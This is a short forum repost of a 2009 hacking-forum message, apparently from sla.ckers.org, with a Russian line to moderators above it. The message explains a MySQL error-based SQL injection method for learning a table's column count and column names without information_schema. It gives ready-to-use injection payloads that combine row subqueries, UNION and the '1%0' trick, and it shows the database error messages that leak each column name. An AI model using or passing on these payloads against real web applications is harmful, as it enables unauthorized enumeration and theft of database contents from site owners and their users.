почистите тему от мусора, модеры.

http://sla.ckers.org/forum/read.php?16,32472

MYSQL - Retrieving some column's name using Row SubQueries
Posted by: Paic (IP Logged)
Date: November 25, 2009 11:56AM

Hi,

I've recently found an interesting way of retrieving column's name from other tables than the one used in the query when information_schema table is not accessible. It assume you've already found some table's name.
It is using the 1%0 trick and MySQL subqueries.

Maybe you all know about that but I would like to share it!

I was playing around with sql subqueries when I've found something very interesting: "Row Subqueries"

You'd better read this in order to understand what's next:
[dev.mysql.com]

The hint is "The row constructor and the row returned by the subquery must contain the same number of values."

Ok, imagine you have the table USER_TABLE. You don't have any other informations than the table's name.
The sql query is expecting only one row as result.

Here is our input:
' AND (SELECT * FROM USER_TABLE) = (1);

MySQL answer:
"Operand should contain 7 column(s)"

MySQL told us that the table USER_TABLE has 7 columns! That's great!

Now we can use the UNION and 1%0 to retrieve some column's name:

The following query shouldn't give you any error:
' AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1,2,3,4,5,6,7 LIMIT 1);

Now let's try with the first colum, simply add %0 to the first column in the UNION:
' AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1%0,2,3,4,5,6,7 LIMIT 1);

MySQL answer:
"Column 'usr_u_id' cannot be null"

We've got the first column name: "usr_u_id"

Then we proceed with the other columns...

Example with the 4th column:
' AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1,2,3,4%0,5,6,7 LIMIT 1);


If MySQL doesn't reply with an error message, this is just because the column can be empty and you won't be able to get it's name!

Paic

__________________
ПИУ-ПИУ...